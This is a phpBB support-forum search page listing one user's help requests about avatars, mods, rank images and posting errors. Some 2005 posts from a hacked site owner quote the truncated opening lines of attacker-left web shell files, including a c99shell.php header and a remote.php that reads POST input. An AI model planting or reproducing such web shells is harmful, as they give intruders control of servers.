Search found 16 matches

by Todesengel
Thu May 01, 2008 10:24 pm
Forum: 2.0.x Support Forum
Topic: Avatar Max Dimensions not enforced
Replies: 1
Views: 122

Avatar Max Dimensions not enforced

I am unable to figure out what exactly is going on. I have max dimensions set in control panel to 75x75, but no matter what image is uploaded, or even remote linked, it will display on the forum at its normal resolution. It will not deny the user the avatar. Here is my usercp_avatar. Any help would ...
by Todesengel
Wed Dec 12, 2007 9:11 pm
Forum: [2.0.x] MOD Database Releases
Topic: ACP Site Announcement Centre
Replies: 206
Views: 50403

Re: ACP Site Announcement Centre

Here is the code in my constants file, even when I put the standard code back in, it keeps saying the database does not exist. Maybe I left something out? I triple checked the installation, line by line and I still cant get the guest announcement to show up. When I changed it to registered users onl...
by Todesengel
Wed Dec 12, 2007 1:04 am
Forum: [2.0.x] MOD Database Releases
Topic: ACP Site Announcement Centre
Replies: 206
Views: 50403

Re: ACP Site Announcement Centre

Great mod, I got it to work but I had some problems. Main problem was, your SQL says to create this table. CREATE TABLE `phpbb_announcement_centre` And then the mod is requesting this table ANNOUNCEMENTS_LEFTY74_TABLE', All I had to do was change the name of the table in the codes. Is there anyway t...
by Todesengel
Sat Dec 08, 2007 10:14 pm
Forum: 2.0.x Support Forum
Topic: Firefox not showing rank image
Replies: 3
Views: 156

Re: Firefox not showing rank image

LOLOLOL! I totally figured it out. And thanks to you!!

I was using these \ instead of /
by Todesengel
Sat Dec 08, 2007 10:11 pm
Forum: 2.0.x Support Forum
Topic: Firefox not showing rank image
Replies: 3
Views: 156

Re: Firefox not showing rank image

No sir, I do not.

Image path is, "images/ranks/rank1.gif". Without the quotes of course. They show up just fine in IE, if I did have a slash, the path would be invalid and they would show a red X, right?
by Todesengel
Sat Dec 08, 2007 10:00 pm
Forum: 2.0.x Support Forum
Topic: Firefox not showing rank image
Replies: 3
Views: 156

Firefox not showing rank image

Hello, I have been searching for the past couple hours, and cannot find anything on this subject. So my last resort was to make a new post here. I just added rank images to my phpbb forum, and when I view the forum in IE the rank image and rank show up just fine. When I load it up in firefox, the ra...
by Todesengel
Fri Dec 29, 2006 1:44 pm
Forum: 2.0.x Support Forum
Topic: Error while posting a new message or reply
Replies: 4
Views: 184

This is line 330 at the top, to 340 at the bottom. In line 332 its just a }. $old_poll_result = array(); if ($mode == 'editpost' && $post_data['has_poll']) { $sql = "SELECT vote_option_id, vote_result FROM " . VOTE_RESULTS_TABLE . " WHERE vote_id = $poll_id ORDER BY vote_option_id ASC"; if (!($resul...
by Todesengel
Fri Dec 29, 2006 10:47 am
Forum: 2.0.x Support Forum
Topic: Error while posting a new message or reply
Replies: 4
Views: 184

Error while posting a new message or reply

Everytime I try to post a new message or reply after doing the phpbb update, I get this error.
Fatal error: Call to a member function on a non-object in /home/swvwb08/public_html/savageindustries/forum/includes/functions_post.php on line 332



Any ideas?
by Todesengel
Fri Dec 16, 2005 12:10 am
Forum: 2.0.x Support Forum
Topic: What can you make of these files...
Replies: 9
Views: 2250

Oh I just found this... This explains a lot.... <?php /* ****************************************************************************************************** * * c99shell.php v.1.0 pre-release build #12 * Freeware license. * © CCTeaM. * c99shell - ôàéë-ìåíåäæåð ÷åðåç www-áðîóçåð, "çàòî÷åíûé" äëÿ â...
by Todesengel
Fri Dec 16, 2005 12:06 am
Forum: 2.0.x Support Forum
Topic: What can you make of these files...
Replies: 9
Views: 2250

What would be the best way to find out if code was added to the database? I really dont want to wipe it. As i was writing this code, my site got hacked again, they uploaded a index.html and some flash things to the root directory. I have no idea how they are getting in. but they backedup my index.ht...
by Todesengel
Thu Dec 15, 2005 11:47 pm
Forum: 2.0.x Support Forum
Topic: What can you make of these files...
Replies: 9
Views: 2250

What can you make of these files...

When my site got hacked, they left behind all these files. And TONS of .htaccess files. I've been going thru every folder on my server deleting these files 1 by 1. I dont know php, so maybe you guys can tell me what these files are, or what they do. remote.php <?php error_reporting(0); if(isset($_PO...
by Todesengel
Thu Dec 15, 2005 9:06 am
Forum: 2.0.x Support Forum
Topic: Blank admin page, and signup page
Replies: 6
Views: 154

Anybody know? I have replaced every phpbb file and nothing. you are missing some of the language file upload new copies of lang_main.php and lang_admin.php robert Thank you great phpbb god!! That was it! I guess when I uploaded them again it didnt work properly. All the file sizes were different th...
by Todesengel
Thu Dec 15, 2005 7:09 am
Forum: 2.0.x Support Forum
Topic: Blank admin page, and signup page
Replies: 6
Views: 154

Anybody know? I have replaced every phpbb file and nothing.
by Todesengel
Thu Dec 15, 2005 4:36 am
Forum: 2.0.x Support Forum
Topic: Blank admin page, and signup page
Replies: 6
Views: 154

Blank admin page, and signup page

When i go to my admin page, only a few items will show what each check box, or drop down menu does. Also the signup page is blank. Its like the font blends in with the background, I have tried to change the template, and it does it to everyone. What is going on here. You can find it here. http://www...
by Todesengel
Mon Dec 12, 2005 8:58 pm
Forum: 2.0.x Support Forum
Topic: What happened to my forum?
Replies: 1
Views: 74

What happened to my forum?

I wake up today, and I go to browser my forum, and it is a link to some advertising stuff. Same with my embeded gallery. I was using version 2.0.18. I'm trying to fix it right now. So any help would be appreciated.

www.swvw.net/forum

Go to advanced search